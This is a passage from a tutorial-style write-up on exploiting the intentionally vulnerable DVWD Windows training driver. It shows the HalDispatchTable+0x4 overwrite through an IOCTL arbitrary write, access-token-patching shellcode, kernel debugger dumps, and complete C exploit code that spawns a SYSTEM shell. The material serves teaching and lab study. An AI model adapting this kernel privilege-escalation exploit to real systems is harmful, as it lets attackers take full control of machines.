        So to sum up, we abuse the IOCTL  DEVICOIO_DVWD_OVERWRITE in order to write what we want, where we want:
        • what =  address of our shellcode,
        • where = address of nt!HalDispatchTable+0x4
        It's important to understand that it's necessary to control those 2 components in order to exploit that kind of vulnerability.

        NB: Here, we can overwrite the whole addresses (4 bytes) but we can imagine a case where we can only overwrite 1 byte. In such a scenario, it's necessary to overwrite the MSB (Most Significant Byte) of the second entry of HalDispatchTable with a value that makes the address in userland (< 0x80000000): for example, we can take 0x01. Then, we need to put a large NOP sled in the address range 0x01000000-0x02000000 (memory marked as RWX) with a jump to our shellcode at the end.

        Hey... wait ! I have to talk about the shellcode we use...


        3. Shellcoding... patch my Access Token and go back to Ring 3
         
        It's not like when we're exploiting a software in userland, here our shellcode will be executed in kernelland and so we don't have the right to do any mistake or we will get a BSOD in our face. Typically in kernel local exploitation, we use the full privileges we have when we are in Ring 0 in order to patch the Access Token of the current process to change the User SID of the process by the SID of NT AUTHORITY\SYSTEM. And then, we go back to Ring 3 as quickly as possible and then, we can do what we want such as spawning a shell.

        In Windows, the Access Token (or just called Token) is used for describing the security context of a process or a thread. In particular, it stores the User SID, a list of Groups SIDs and a list of Privileges. Based on this information, the kernel is able to decide if an action asked by the process is authorized or not (access control). In user space, it's possible to get an handle on a Token. More information about Tokens is given in [4].
        Here is the detail of the structure _TOKEN used for describing an Access Token:

        kd> dt nt!_token
           +0x000 TokenSource      : _TOKEN_SOURCE
           +0x010 TokenId          : _LUID
           +0x018 AuthenticationId : _LUID
           +0x020 ParentTokenId    : _LUID
           +0x028 ExpirationTime   : _LARGE_INTEGER
           +0x030 TokenLock        : Ptr32 _ERESOURCE
           +0x038 AuditPolicy      : _SEP_AUDIT_POLICY
           +0x040 ModifiedId       : _LUID
           +0x048 SessionId        : Uint4B
           +0x04c UserAndGroupCount : Uint4B
           +0x050 RestrictedSidCount : Uint4B
           +0x054 PrivilegeCount   : Uint4B
           +0x058 VariableLength   : Uint4B
           +0x05c DynamicCharged   : Uint4B
           +0x060 DynamicAvailable : Uint4B
           +0x064 DefaultOwnerIndex : Uint4B
           +0x068 UserAndGroups    : Ptr32 _SID_AND_ATTRIBUTES
           +0x06c RestrictedSids   : Ptr32 _SID_AND_ATTRIBUTES
           +0x070 PrimaryGroup     : Ptr32 Void
           +0x074 Privileges       : Ptr32 _LUID_AND_ATTRIBUTES
           +0x078 DynamicPart      : Ptr32 Uint4B
           +0x07c DefaultDacl      : Ptr32 _ACL
           +0x080 TokenType        : _TOKEN_TYPE
           +0x084 ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL
           +0x088 TokenFlags       : UChar
           +0x089 TokenInUse       : UChar
           +0x08c ProxyData        : Ptr32 _SECURITY_TOKEN_PROXY_DATA
           +0x090 AuditData        : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
           +0x094 LogonSession     : Ptr32 _SEP_LOGON_SESSION_REFERENCES
           +0x098 OriginatingLogonSession : _LUID
           +0x0a0 VariablePart     : Uint4B

        The list of pointers to SIDs is stored in the field UserAndGroups (type _SID_AND_ATTRIBUTES). We can retrieve information contained into a Token for a given process with kd, as follows (example with the "System" process):

        kd> !process 0004
        Searching for Process with Cid == 4
        Cid handle table at e1ed7000 with 428 entries in use
        
        PROCESS 827a6648  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
            DirBase: 00587000  ObjectTable: e1000c60  HandleCount: 388.
            Image: System
            VadRoot 82337238 Vads 4 Clone 0 Private 3. Modified 5664. Locked 0.
            DeviceMap e1001070
            Token                             e1001720
            ElapsedTime                       00:37:34.750
            UserTime                          00:00:00.000
            KernelTime                        00:00:01.578
            QuotaPoolUsage[PagedPool]         0
            QuotaPoolUsage[NonPagedPool]      0
            Working Set Sizes (now,min,max)  (43, 0, 345) (172KB, 0KB, 1380KB)
            PeakWorkingSetSize                526
            VirtualSize                       1 Mb
            PeakVirtualSize                   2 Mb
            PageFaultCount                    4829
            MemoryPriority                    BACKGROUND
            BasePriority                      8
            CommitCharge                      8
        
        
        kd> !token e1001720
        _TOKEN e1001720
        TS Session ID: 0
        User: S-1-5-18
        Groups:
         00 S-1-5-32-544
            Attributes - Default Enabled Owner
         01 S-1-1-0
            Attributes - Mandatory Default Enabled
         02 S-1-5-11
            Attributes - Mandatory Default Enabled
        Primary Group: S-1-5-18
        Privs:
         00 0x000000007 SeTcbPrivilege                    Attributes - Enabled Default
         01 0x000000002 SeCreateTokenPrivilege            Attributes -
         02 0x000000009 SeTakeOwnershipPrivilege          Attributes -
        [...]

        Well, the idea is actually to replace the pointer to the process owner's SID by a pointer to the built-in NT AUTHORITY\SYSTEM SID (S-1-5-18). We also patch the group BUILTIN\Users SID (S-1-5-32-545) with the group BUILTIN\Administrators SID (S-1-5-32-544).

        The source code is in the file Shellcode32.c. It's taken from DVWDDriver, I've just added many comments to make it easily understandable.


        4.To sum up...
         
        Here is what we need to do in the exploit:
        1. Load the kernel executive ntoskrnl.exe in userland in order to be able to get the offset of HalDispatchTable and then to deduce its address in kernelland.
        2. Retrieve the address of our shellcode. This is actually the address of the function aimed to patch the Access Token. But... there is a tricky point to notice: the pointer that we overwrite in HalDispatchTable normally points to a function which takes 4 arguments (4 values are pushed on the stack before: call dword ptr [nt!HalDispatchTable+0x4]). Therefore, we use a shellcode function with 4 arguments, just for compatibility reasons.
        3. Retrieve the address of the syscall NtQueryIntervalProfile() within ntdll.dll.
        4. Overwrite the pointer at nt!HalDispatchTable+0x4 with the address of our shellcode function.. yeah the one with 4 arguments that patches the process' Token. This is done by calling DeviceIoControl() 2 consecutive times for sending 2 IOCTL: DEVICOIO_DVWD_STORE and then DEVICOIO_DVWD_OVERWRITE in the way it was explained in paragraph 2.
        5. Call the function NtQueryIntervalProfile() in order to launch the shellcode
        6. Well.. at this point the process is running under the System account, so we're done and we can spawn a shell for example, or do what else we want !
        A global overview is given in the following figure taken from [2]


          5. Exploit code

          Here is the code of the exploit developed by the authors of DVWDDriver. When I've read that code, I've added many comments in order to be sure to understand everything that is done. With the previous explanation, it should be actually quite easy to understand, nothing is very tricky here =)

          // ----------------------------------------------------------------------------
          // Arbitrary Memory Overwrite exploitation ------------------------------------
          // ---- HalDispatchTable pointer overwrite method -----------------------------
          // ----------------------------------------------------------------------------
          
          
          // Overwrite kernel dispatch table HalDispatchTable's second entry:
          //  - STORE the address of the shellcode (pointer in kernelland, points to userland)
          //  - OVERWRITE the second pointer in the HalDispatchTable with the address of the shellcode
          BOOL OverwriteHalDispatchTable(ULONG_PTR HalDispatchTableTarget, ULONG_PTR ShellcodeAddrStorage) {
          
           HANDLE hFile;
           BOOL ret;
           DWORD dwReturn;
           ARBITRARY_OVERWRITE_STRUCT overwrite;
          
           // Open handle to the driver
           hFile = CreateFile(L"\\\\.\\DVWD", 
                  GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
                  NULL, 
                  OPEN_EXISTING, 
                  0, 
                  NULL);
          
           if(hFile != INVALID_HANDLE_VALUE) {
           
            // DEVICEIO_DVWD_STORE
            // -> store the address of the shellcode into kernelland (GlobalOverwriteStruct) 
            overwrite.Size = 4;
            overwrite.StorePtr = (PVOID)&ShellcodeAddrStorage;
            ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
          
            // DEVICEIO_DVWD_OVERWRITE 
            // -> copy the content of the buffer in kernelland (the address previously added)
            // to the location HalDispatchTableTarget (second entry in the HalDispatchTable)
            overwrite.Size = 4;
            overwrite.StorePtr = (PVOID)HalDispatchTableTarget;
            ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
          
            CloseHandle(hFile);
            
            return TRUE;
           }
          
           return FALSE;  
          }
          
          
          
          typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
          BOOL TriggerOverwrite32_NtQueryIntervalProfileWay() {
          
           ULONG dummy = 0;
           ULONG_PTR HalDispatchTableTarget;
           ULONG_PTR ShellcodeAddrStorage; 
          
           _NtQueryIntervalProfile NtQueryIntervalProfile;
          
           // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
           if(LoadAndGetKernelBase() == FALSE) {
            return FALSE;
           }
          
           // Retrieve the address of the shellcode
           ShellcodeAddrStorage = (ULONG_PTR)UserShellcodeSIDListPatchUser4Args;
           
           // Retrieve the address of the second entry within the HalDispatchTable
           HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);
           
           // Retrieve the address of the syscall NtQueryIntervalProfile within ntdll.dll
           NtQueryIntervalProfile  = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
          
           // Overwrite the pointer in HalDispatchTable
           if(OverwriteHalDispatchTable(HalDispatchTableTarget, ShellcodeAddrStorage) == FALSE) {
            return FALSE;
           }
          
           // Call the function in order to launch our shellcode
           // kd> u nt!KeQueryIntervalProfile
           NtQueryIntervalProfile(2, &dummy);
          
           if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
            wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
            return FALSE;
           }
          
           return TRUE;
          }
          

          6. w00t ?

          It's time to try the exploit:
          DVWDExploit.exe --exploit-overwrite-profile-32


          Yeah !! we spawn a shell cmd.exe that is running with NT AUTHORITY\SYSTEM privileges. w00t =)


          References

          [1] SSDT Uninformed article
          http://uninformed.org/index.cgi?v=8&a=2&p=10

          [2] Exploiting Common Flaws in Drivers, by Ruben Santamarta
          http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

          [3] NtQueryIntervalProfile(),
          http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Profile/NtQueryIntervalProfile.html

          [4] Windows Internals, book by Mark Russinovich & David Salomon